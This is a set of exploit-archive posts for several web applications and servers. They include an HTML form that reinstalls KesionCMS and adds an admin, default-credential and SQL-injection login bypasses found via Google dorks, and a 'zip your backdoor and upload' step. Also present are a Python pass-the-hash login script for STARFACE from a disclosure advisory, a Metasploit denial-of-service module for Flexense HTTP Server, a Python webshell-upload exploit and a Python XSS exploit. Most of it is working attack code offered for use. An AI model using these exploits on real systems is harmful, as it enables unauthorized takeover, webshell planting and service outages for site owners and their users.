<pre><code>====================================================================================================================================<br />| # Title : KesionCMS ASP v9.5 Reinstall Add Admin Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit) | <br />| # Vendor : https://www.kesion.com/ | <br />| # Dork : Powered by KesionCMS |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] copy & past this exploit listed below into a text file and save it with ".html" extension<br /><br />[+] at Line 09 & 16 change the domain name of target .<br /><br />[+] The infected folder is /install/<br /> This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation<br /> The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator. <br /> For this, the vulnerability can be exploited through the direct link or using the exploitation written below<br /><br /><br />[+] Exploit<br /><br /> <head><title><br /> Hacked By indoushka<br /> </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" /><br /> <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script><br /> <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script><br /> </head><br /> <body> <br /> <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form"><br /> <div class="guide"><br /> <div class="guidetitle"><br /> </div><br /> <div class="clear"></div><br /> </div><br /> <div class="clear"></div><br /> <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5" /><br /> <input type="hidden" name="DBlx" value="" /><br /> <input type="hidden" name="CkbData" value="" /><br /> <br /> <input type="hidden" name="TxtDBName_a" value="" /><br /> <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden" /><br /> <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" /><br /> <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" /><br /> <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden" /><br /> <br /><div id="http://www.target.127.0.0.1/install/?action=s4"><br /> <br /> <br /><br /> </div><br /> <div class="clear"></div><br /> <div class="sjlist"><br /> <h5>网站参数配置</h5><br /> <ul><br /> <li><span>网站名称:</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如:Kesion官方站</li><br /> <li><span>网站域名:</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 如http://www.kesion.com。<br /> </li><br /> <li><span>安装目录:</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。 <br /> 系统会自动获取,建议不要修改。<br /> </li><br /> <li><span>授 权 码:</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text"><br /> 免费版本用户请留空或填“0”。<br /> </li><br /> <li><span>后台目录:</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如:Manage,Admin,后面必须带"/"符号。</li><br /> <li><span> 后台登录验证码:</span><br /> <input type="radio" name="isCode_a" value="True" /> 启用 <br /> <input type="radio" value="False" name="isCode_a" checked="checked"/> 不启用<br /> </li><br /> <br /> <li><span>管理认证码:</span><br /> <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用 <input onclick="$('#rzm').hide()" type="radio" value="False" name="isCode" checked="checked" /> 不启用 <br /> <font id="rzm" style="display:none">认证码:<input name="TxtManageCode" value="8888" id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li><br /> </ul><br /> <div class="clear"></div><br /> <h5>填写管理员信息</h5><br /> <ul><br /> <li><span>管理员账号:</span><input name="TxtUserName" value="admin" id="TxtUserName" class="text" type="text"><font color="red">*</font> </li><br /> <li><span>管理员密码:</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li><br /> <li><span>重复密码:</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li><br /> </ul><br /> <div class="clear blank10"></div><br /> <br /> <div style="padding:5px"><br /> <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit"><br /> </div><br /> </div><br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Inlislite V3.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://inlislite.perpusnas.go.id/?read=installerphp | <br />| # Dork : Inlislite V3.1 © 2017 - 2018 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin<br /><br />[+] https://127.0.0.1.online/backend/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>================================================================================<br />| # Title : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits) | <br />| # Vendor : https://www.vaskar.in/ | <br />| # Dork : "shop_detail.php?detail=" |<br />================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : User & Pass : ' or 0=0 #<br /><br />[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.php<br /><br />Greetings to :=====================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |<br />===================================================================================================<br /></code></pre>
<pre><code>Advisory: STARFACE: Authentication with Password Hash Possible<br /><br />RedTeam Pentesting discovered that the web interface of STARFACE as well<br />as its REST API allows authentication using the SHA512 hash of the<br />password instead of the cleartext password. While storing password<br />hashes instead of cleartext passwords in an application's database<br />generally has become best practice to protect users' passwords in case<br />of a database compromise, this is rendered ineffective when allowing to<br />authenticate using the password hash.<br /><br /><br />Details<br />=======<br /><br />Product: STARFACE<br />Affected Versions: 7.3.0.10 and earlier versions<br />Fixed Versions: -<br />Vulnerability Type: Broken Authentication<br />Security Risk: low<br />Vendor URL: https://www.starface.de<br />Vendor Status: notified<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004<br />Advisory Status: published<br />CVE: CVE-2023-33243<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243<br /><br /><br />Introduction<br />============<br /><br />"When functionality and comfort come together, the result is a<br />state-of-the-art experience that we've dubbed 'comfortphoning'. It's a<br />secure, scalable digital communication solution that meets every need<br />and wish. STARFACE is easy to integrate into existing IT systems and<br />flexibly grows with your requirements."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from<br />the vendor's homepage [1]. The included files can be further examined by<br />either extracting the contents or running the image in a virtual<br />machine. The web interface of the PBX uses the JavaScript file at the<br />following path to submit the login form:<br /><br />------------------------------------------------------------------------<br />js/prettifier.js<br />------------------------------------------------------------------------<br /><br />The following two lines of the JavaScript file "prettifier.js" add the<br />two parameters "secret" and "ack" to the form before being submitted:<br /><br />------------------------------------------------------------------------<br />$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));<br />$form(document.forms[0]).add('ack', defaultVals.k);<br />------------------------------------------------------------------------<br /><br />The JavaScript object "defaultVals" is included in the web application's<br />source text. While the value of "defaultVals.k" was found to be the<br />static hash of the PBX version, the value of "defaultVals.bk" contains a<br />nonce only valid for the currently used session. Therefore, the form<br />parameter "ack" is always the same value. For the form value "secret"<br />the function "createHash()" is called with different arguments. The<br />value of "defaultVals.isAd" is set to "false" when login via Active<br />Directory is disabled. The parameters "liv" and "lpv" contain the<br />username and password entered into the form respectively.<br /><br />------------------------------------------------------------------------<br />const createHash = function (isAD, user, pass, nonces) {<br /> if (isAD) {<br /> return forAD.encode(user + nonces + pass);<br /> }<br /> return user + ':' + forSF(user + nonces + forSF(pass));<br />};<br />------------------------------------------------------------------------<br /><br />The expression right after the second return statement is the<br />implementation used when Active Directory login is disabled which is the<br />default setting. The return value is composed of the username separated<br />via a colon from a value built using the "forSF()" function. The<br />"forSF()" function was found to calculate the SHA512 hash value. When<br />considering the arguments passed to the function, the hash is calculated<br />as follows:<br /><br />------------------------------------------------------------------------<br />SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))<br />------------------------------------------------------------------------<br /><br />As can be seen, instead of the cleartext password the SHA512 hash of the<br />password is used in the calculation. In conclusion, for the form value<br />"secret" the following value is transmitted:<br /><br />------------------------------------------------------------------------<br />username + ":" + SHA512(<br /> username + defaultVals.k + defaultVals.bk + SHA512(password)<br />)<br />------------------------------------------------------------------------<br /><br />If the SHA512 hash of a user's password is known, it can be directly<br />used in the calculation of the "secret" during the login process.<br />Knowledge of the cleartext password is not required.<br /><br />This finding was also verified by analysing the decompiled Java code of<br />the server component. It was also found that the authentication process<br />of the REST API is vulnerable in a very similar manner.<br /><br /><br />Proof of Concept<br />================<br /><br />The following Python script can be used to perform a login by specifying<br />a target URL, a username and the associated password hash:<br /><br />------------------------------------------------------------------------<br />#!/usr/bin/env python3<br /><br />import click<br />import hashlib<br />import re<br />import requests<br />import typing<br /><br /><br />def get_values_from_session(url, session) -> typing.Tuple[str, str]:<br /> k, bk = "", ""<br /> response_content = session.get(f"{url}/jsp/index.jsp").text<br /> k_result = re.search("\sk : '([^']+)'", response_content)<br /> bk_result = re.search("\sbk : '([^']+)'", response_content)<br /> if k_result != None:<br /> k = k_result.group(1)<br /> if bk_result != None:<br /> bk = bk_result.group(1)<br /> return k, bk<br /><br /><br />def web_login(url, login, pwhash, session) -> bool:<br /> version, nonce = get_values_from_session(url, session)<br /> if version == "" or nonce == "":<br /> print("Web Login failed: Nonce and version hash can not be retrieved.")<br /> return<br /> value = login + version + nonce + pwhash<br /> secret = hashlib.sha512(value.encode("utf-8")).hexdigest()<br /> data = {<br /> "forward": "",<br /> "autologin": "false",<br /> "secret": f"{login}:{secret}",<br /> "ack": version,<br /> }<br /> login_request = session.post(<br /> f"{url}/login",<br /> data=data,<br /> allow_redirects=False,<br /> headers={"Referer": f"{url}/jsp/index.jsp"},<br /> )<br /> response_headers = login_request.headers<br /> if "Set-Cookie" in response_headers:<br /> session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]<br /> print(f"Session ID: {session_id}")<br /> return True<br /> else:<br /> print("Invalid login data")<br /> return False<br /><br /><br />def get_nonce_from_api(url, session) -> str:<br /> response_content = session.get(f"{url}/rest/login").json()<br /> return response_content["nonce"] if "nonce" in response_content else ""<br /><br /><br />def rest_login(url, login, pwhash, session):<br /> nonce = get_nonce_from_api(url, session)<br /> if nonce == "":<br /> print("REST Login failed: Nonce can not be retrieved.")<br /> return<br /> value = login + nonce + pwhash<br /> secret = hashlib.sha512(value.encode("utf-8")).hexdigest()<br /> data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}<br /> login_request = session.post(<br /> f"{url}/rest/login",<br /> json=data,<br /> headers={"Content-Type": "application/json", "X-Version": "2"},<br /> )<br /> response_data = login_request.json()<br /> token = response_data["token"] if "token" in response_data else "none"<br /> print(f"REST API Token: {token}")<br /><br /><br />@click.command()<br />@click.option('--url', help='Target System URL', required=True)<br />@click.option('--login', help='Login ID', required=True)<br />@click.option('--pwhash', help='Password Hash', required=True)<br />def login(url, login, pwhash):<br /> session = requests.session()<br /> stripped_url = url.rstrip("/")<br /> result = web_login(stripped_url, login, pwhash, session)<br /> if result:<br /> rest_login(stripped_url, login, pwhash, session)<br /><br /><br />if __name__ == "__main__":<br /> login()<br />------------------------------------------------------------------------<br /><br />For example, the SHA512 hash of the password "starface" can be<br />calculated as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n "starface" | sha512sum<br />a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -<br />------------------------------------------------------------------------<br /><br />The Python script can be run as follows to perform a login as the user<br />"0001" with the aforementioned hash:<br /><br />------------------------------------------------------------------------<br />$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash<br />'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'<br />Session ID: 2CF09656E274F000FFAD023AF37629CE<br />REST API Token: 51eef8f8vp3d3u81k0imjbuuu7<br />------------------------------------------------------------------------<br /><br />When the password hash is valid for the specified user of the targeted<br />instance a session ID as well as a REST API token is returned.<br />Afterwards, these values can be used to interact with the web<br />application and the REST API.<br /><br /><br />Workaround<br />==========<br /><br />None<br /><br /><br />Fix<br />===<br /><br />On 4 May 2023, version 8.0.0.11 was released. In this version the<br />vulnerability was addressed with a temporary solution, such that the<br />password hashes are encrypted before they are saved in the database.<br />This approach prevents attackers from exploiting this vulnerability in<br />scenarios where they have only acquired pure database access. However,<br />attackers with system level access can bypass this temporary measure as<br />they can extract the encryption key and decrypt the hashes in the<br />database. A solution that fixes this vulnerability entirely is still in<br />progress.<br /><br /><br />Security Risk<br />=============<br /><br />The web interface and REST API of STARFACE allow to login using the<br />password hash instead of the cleartext password. This can be exploited<br />by attackers who gained access to the application's database where the<br />passwords are also saved as a SHA512 hash of the cleartext passwords.<br />While the precondition for this attack could be the full compromise of<br />the STARFACE PBX, another attack scenario could be that attackers<br />acquire access to backups of the database stored on another system.<br />Furthermore, the login via password hash allows attackers for permanent<br />unauthorised access to the web interface even if system access was<br />obtained only temporarily. Due to the prerequisites of obtaining access<br />to password hashes, the vulnerability poses a low risk only.<br /><br /><br />Timeline<br />========<br /><br />2022-12-06 Vulnerability identified<br />2022-12-13 Customer approved disclosure to vendor<br />2023-01-11 Vendor notified<br />2023-05-04 Vendor released new version 8.0.0.11<br />2023-05-19 CVE ID requested<br />2023-05-20 CVE ID assigned<br />2023-06-01 Advisory released<br /><br /><br />References<br />==========<br /><br />[0] https://starface.com/en/products/comfortphoning/<br />[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://jobs.redteam-pentesting.de/<br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Alter Posthof 1 Fax : +49 241 510081-99<br />52062 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
<pre><code>##<br /># Exploit Title: Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)<br /># Date: 2018-03-09<br /># Exploit Author: Ege Balci<br /># Vendor Homepage: https://www.flexense.com/downloads.html<br /># Version: <= 10.6.24<br /># CVE : CVE-2018-8065<br /><br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Auxiliary::Dos<br /> include Msf::Exploit::Remote::Tcp<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Flexense HTTP Server Denial Of Service',<br /> 'Description' => %q{<br /> This module triggers a Denial of Service vulnerability in the Flexense HTTP server.<br /> Vulnerability caused by a user mode write access memory violation and can be triggered with<br /> rapidly sending variety of HTTP requests with long HTTP header values.<br /><br /> Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.<br /> },<br /> 'Author' => [ 'Ege Balci <ege.balci@invictuseurope.com>' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2018-8065'],<br /> [ 'URL', 'https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS' ],<br /> ],<br /> 'DisclosureDate' => '2018-03-09'))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(80),<br /> OptString.new('PacketCount', [ true, "The number of packets to be sent (Recommended: Above 1725)" , 1725 ]),<br /> OptString.new('PacketSize', [ true, "The number of bytes in the Accept header (Recommended: 4088-5090" , rand(4088..5090) ])<br /> ])<br /><br /> end<br /><br /> def check<br /> begin<br /> connect<br /> sock.put("GET / HTTP/1.0\r\n\r\n")<br /> res = sock.get<br /> if res and res.include? 'Flexense HTTP Server v10.6.24'<br /> Exploit::CheckCode::Appears<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> rescue Rex::ConnectionRefused<br /> print_error("Target refused the connection")<br /> Exploit::CheckCode::Unknown<br /> rescue<br /> print_error("Target did not respond to HTTP request")<br /> Exploit::CheckCode::Unknown<br /> end<br /> end<br /><br /> def run<br /> unless check == Exploit::CheckCode::Appears<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /><br /> size = datastore['PacketSize'].to_i<br /> print_status("Starting with packets of #{size}-byte strings")<br /><br /> count = 0<br /> loop do<br /> payload = ""<br /> payload << "GET /" + Rex::Text.rand_text_alpha(rand(30)) + " HTTP/1.1\r\n"<br /> payload << "Host: 127.0.0.1\r\n"<br /> payload << "Accept: "+('A' * size)+"\r\n"<br /> payload << "\r\n\r\n"<br /> begin<br /> connect<br /> sock.put(payload)<br /> disconnect<br /> count += 1<br /> break if count==datastore['PacketCount']<br /> rescue ::Rex::InvalidDestination<br /> print_error('Invalid destination! Continuing...')<br /> rescue ::Rex::ConnectionTimeout<br /> print_error('Connection timeout! Continuing...')<br /> rescue ::Errno::ECONNRESET<br /> print_error('Connection reset! Continuing...')<br /> rescue ::Rex::ConnectionRefused<br /> print_good("DoS successful after #{count} packets with #{size}-byte headers")<br /> return true<br /> end<br /> end<br /> print_error("DoS failed after #{count} packets of #{size}-byte strings")<br /> end<br />end<br /> <br /></code></pre>
<pre><code># Exploit Title: Faculty Evaluation System 1.0 - Unauthenticated File Upload<br /># Date: 5/29/2023<br /># Author: Alex Gan<br /># Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip<br /># Version: 1.0<br /># Tested on: LAMP Fedora server 38 (Thirty Eight) Apache/2.4.57 10.5.19-MariaDB PHP 8.2.6<br /># CVE: CVE-2023-33440<br /># References: https://nvd.nist.gov/vuln/detail/CVE-2023-33440<br /># https://www.exploit-db.com/exploits/49320<br /># https://github.com/F14me7wq/bug_report/tree/main/vendors/oretnom23/faculty-evaluation-system<br /># <br />#!/usr/bin/env python3<br />import os<br />import sys<br />import requests<br />import argparse<br />from bs4 import BeautifulSoup<br />from urllib.parse import urlparse<br />from requests.exceptions import ConnectionError, Timeout<br /><br />def get_args():<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-u', '--url', type=str, help='URL')<br /> parser.add_argument('-p', '--payload', type=str, help='PHP webshell')<br /> return parser.parse_args()<br /><br />def get_user_input(args):<br /> if not (args.url):<br /> args.url = input('Use the -u argument or Enter URL:')<br /> if not (args.payload):<br /> args.payload = input('Use the -p argument or Enter file path PHP webshell: ')<br /> return args.url, args.payload<br /><br />def check_input_url(url):<br /> parsed_url = urlparse(url)<br /> if not parsed_url.scheme:<br /> url = 'http://' + url<br /> if parsed_url.path.endswith('/'):<br /> url = url.rstrip('/')<br /> return url<br /><br />def check_host_availability(url):<br /> try:<br /> response = requests.head(url=url + '/login.php')<br /> if response.status_code == 200:<br /> print("[+] Host is accessible")<br /> else:<br /> print("[-] Host is not accessible")<br /> print(" Status code:", response.status_code)<br /> sys.exit()<br /> except (ConnectionError, Timeout) as e:<br /> print("[-] Host is not accessible")<br /> sys.exit()<br /> except requests.exceptions.RequestException as e:<br /> print("[-] Error:", e)<br /> sys.exit()<br /><br />def make_request(url, method, files=None):<br /> if method == 'GET':<br /> response = requests.get(url)<br /> elif method == 'POST':<br /> response = requests.post(url, files=files)<br /> else:<br /> raise ValueError(f'Invalid HTTP method: {method}')<br /> <br /> if response.status_code == 200:<br /> print('[+] Request successful')<br /> return response.text<br /> else:<br /> print(f'[-] Error {response.status_code}: {response.text}')<br /> return None<br /><br />def find_file(response_get, filename, find_url):<br /> soup = BeautifulSoup(response_get, 'html.parser')<br /><br /> links = soup.find_all('a')<br /> found_files = []<br /><br /> for link in links:<br /> file_upl = link.get('href')<br /> if file_upl.endswith(filename):<br /> found_files.append(file_upl)<br /><br /> if found_files:<br /> print(' File found:')<br /> for file in found_files:<br /> print('[*] ' + file)<br /><br /> print(' Full URL of your file:')<br /> for file_url in found_files:<br /> print('[*] ' + find_url + file_url)<br /> else:<br /> print('[-] File not found')<br /><br />def main():<br /> args = get_args()<br /> url, payload = get_user_input(args)<br /> url = check_input_url(url)<br /> check_host_availability(url)<br /><br /> post_url = url + "/ajax.php?action=save_user"<br /> get_url = url + "/assets/uploads/"<br /> filename = os.path.basename(payload)<br /> payload_file = [('img',(filename,open(args.payload,'rb'),'application/octet-stream'))]<br /> <br /> print(" Loading payload file")<br /> make_request(post_url, 'POST', files=payload_file)<br /> print(" Listing the uploads directory")<br /> response_get = make_request(get_url, 'GET')<br /> print(" Finding the downloaded payload file")<br /> find_file(response_get, filename, get_url)<br /><br />if __name__ == "__main__":<br /> main()<br /> <br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Menorah Restaurant - Restaurant Food Ordering System Reinstall script Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://codecanyon.net/item/menorah-restaurant-restaurant-food-ordering-system/23180351 | <br />| # Dork : "Menorah Restaurant . All Rights Reserved." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : /install/loading_website/ ( Load default db contain the demo user and pass )<br /><br />[+] https://127.0.0.0.1/e-catering.terantrindotama/install/loading_website/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Acelle Email Marketing v3.0.15 unrestricted file uploads Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/acelle-email-marketing-web-application/17796082 | <br />| # Dork : ". Acelle Email Marketing Application by acellemail.com" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br /><br />[+] Unrestricted file uploads You can upload malicious files in compressed format<br /><br />[+] Dorking İn Google Or Other Search Enggine .<br /><br />[+] chose web site and singup .<br /><br />[+] go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates<br /><br />[+] Zip your backdoor And upload it.<br /><br /><br /> <br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>#Exploit Title: Online Security Guards Hiring System 1.0 – REFLECTED XSS <br />#Google Dork : NA<br />#Date: 23-01-2023<br />#Exploit Author : AFFAN AHMED<br />#Vendor Homepage: https://phpgurukul.com<br />#Software Link: https://phpgurukul.com/projects/Online-Security-Guard-Hiring-System_PHP.zip<br />#Version: 1.0<br />#Tested on: Windows 11 + XAMPP + PYTHON-3.X<br />#CVE : CVE-2023-0527<br /><br />#NOTE: TO RUN THE PROGRAM FIRST SETUP THE CODE WITH XAMPP AND THEN RUN THE BELOW PYTHON CODE TO EXPLOIT IT<br /># Below code check for both the parameter /admin-profile.php and in /search.php<br /><br />#POC-LINK: https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md<br /><br /><br />import requests <br />import re <br />from colorama import Fore<br /><br />print(Fore.YELLOW + "######################################################################" + Fore.RESET)<br />print(Fore.RED + "# TITLE: Online Security Guards Hiring System v1.0" + Fore.RESET)<br />print(Fore.RED + "# VULNERABILITY-TYPE : CROSS-SITE SCRIPTING (XSS)" + Fore.RESET)<br />print(Fore.RED + "# VENDOR OF THE PRODUCT : PHPGURUKUL" + Fore.RESET)<br />print(Fore.RED + "# AUTHOR : AFFAN AHMED" + Fore.RESET)<br />print(Fore.YELLOW +"######################################################################" + Fore.RESET)<br /><br />print()<br />print(Fore.RED+"NOTE: To RUN THE CODE JUST TYPE : python3 exploit.py"+ Fore.RESET)<br />print()<br /><br /><br /># NAVIGATING TO ADMIN LOGIN PAGE<br />Website_url = "http://localhost/osghs/admin/login.php" # CHANGE THE URL ACCORDING TO YOUR SETUP<br />print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)<br />print(Fore.CYAN + "[**] Inserting the Username and Password in the Admin Login Form [**]" + Fore.RESET)<br />print(Fore.RED+"----------------------------------------------------------------------"+Fore.RESET)<br /><br />Admin_login_credentials = {'username': 'admin', 'password': 'Test@123', 'login': ''}<br /><br />headers = {<br /> 'Content-Type': 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36',<br /> 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',<br /> 'Referer': 'http://localhost/osghs/admin/login.php',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'en-US,en;q=0.9',<br /> 'Connection': 'close',<br /> 'Cookie': 'PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc',<br /> 'Sec-Fetch-Site': 'same-origin',<br /> 'Sec-Fetch-Mode': 'navigate',<br /> 'Sec-Fetch-User': '?1',<br /> 'Sec-Fetch-Dest': 'document'<br />}<br /><br />response = requests.request("POST", Website_url, headers=headers, data = Admin_login_credentials)<br />if response.status_code == 200:<br /> location = re.findall(r'document.location =\'(.*?)\'',response.text)<br /> if location:<br /> print(Fore.GREEN + "> Login Successful into Admin Account"+Fore.RESET)<br /> print(Fore.GREEN + "> Popup:"+ Fore.RESET,location )<br /> else:<br /> print(Fore.GREEN + "> document.location not found"+ Fore.RESET)<br />else:<br /> print(Fore.GREEN + "> Error:", response.status_code + Fore.RESET)<br />print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)<br />print(Fore.CYAN + " [**] Trying XSS-PAYLOAD in Admin-Name Parameter [**]" + Fore.RESET)<br /><br /><br /># NAVIGATING TO ADMIN PROFILE SECTION TO UPDATE ADMIN PROFILE <br /># INSTEAD OF /ADMIN-PROFILE.PHP REPLACE WITH /search.php TO FIND XSS IN SEARCH PARAMETER<br />Website_url= "http://localhost/osghs/admin/admin-profile.php" # CHANGE THIS URL ACCORDING TO YOUR PREFERENCE<br /><br /># FOR CHECKING XSS IN ADMIN-PROFILE USE THE BELOW PAYLOAD<br /># FOR CHECKING XSS IN SEARCH.PHP SECTION REPLACE EVERYTHING AND PUT searchdata=<your-xss-payload>&search=""<br />payload = {<br /> "adminname": "TESTAdmin<script>alert(\"From-Admin-Name\")</script>", # XSS-Payload , CHANGE THIS ACCORDING TO YOUR PREFERENCE<br /> "username": "admin", # THESE DETAILS ARE RANDOM , CHANGE IT TO YOUR PREFERENCE<br /> "mobilenumber": "8979555558",<br /> "email": "admin@gmail.com",<br /> "submit": "",<br />}<br /><br /># SENDING THE RESPONSE WITH POST REQUEST<br />response = requests.post(Website_url, headers=headers, data=payload)<br /><br />print(Fore.RED+"----------------------------------------------------------------------"+ Fore.RESET)<br /># CHECKING THE STATUS CODE 200 AND ALSO FINDING THE SCRIPT TAG WITH THE HELP OF REGEX <br />if response.status_code == 200:<br /> scripts = re.findall(r'<script>alert\(.*?\)</script>', response.text)<br /> print(Fore.GREEN + "> Response After Executing the Payload at adminname parameter : "+ Fore.RESET) <br /> print(Fore.GREEN+">"+Fore.RESET,scripts)<br />exploit.py<br />Displaying exploit.py.<br /> <br /></code></pre>
